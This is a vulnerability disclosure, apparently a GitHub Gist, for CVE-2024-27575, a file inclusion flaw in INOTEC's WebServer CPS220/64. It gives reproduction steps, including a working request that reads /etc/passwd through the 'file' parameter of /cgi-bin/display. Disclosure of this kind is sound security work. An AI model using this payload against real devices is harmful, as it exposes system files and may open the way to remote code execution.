Created
March 22, 2024 05:39
-
-
Save s4fv4n/098bd368bf054d008078e369108c2ebd to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE ID : CVE-2024-27575 | |
Vulnerability Title: File Inclusion Vulnerability on INOTEC Sicherheitstechnik GmbH - WebServer CPS220/64 V.3.3.19 | |
Description: | |
File Inclusion vulnerability in INOTEC Sicherheitstechnik GmbH INOTEC Sicherheitstechnik GmbH WebServer CPS220/64 V.3.3.19 allows a remote attacker to read and access sensitive information and which may leads to remote code execution. | |
VulnerabilityType: | |
File Inclusion Vulnerability | |
Vendor of Product: | |
INOTEC Sicherheitstechnik GmbH | |
Affected Product Code Base: | |
INOTEC Sicherheitstechnik GmbH - WebServer CPS220/64 V.3.3.19 - INOTEC Sicherheitstechnik GmbH - WebServer CPS220/64 V.3.3.19 | |
Affected Component: | |
WebServer CPS220/64 V.3.3.19 | |
Vulnerable URL: | |
http://<ip address>/cgi-bin/display?file=/etc/passwd | |
Attack Type: | |
Remote | |
Impact Information Disclosure: | |
true | |
Attack Vectors: | |
Steps to Reproduce the vulnerability: | |
Step 1: Access the INOTEC Sicherheitstechnik GmbH - WebServer CPS220/64 V.3.3.19 web url | |
Step 2 : Navigate to the URL http://<ip address>/cgi-bin/display?file=/etc/passwd | |
Step 3: We will be able to see the /etc/passwd file from the machine. | |
Reference: | |
https://www.inotec-licht.de/ | |
Discoverer: | |
Safvan Parakkal | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment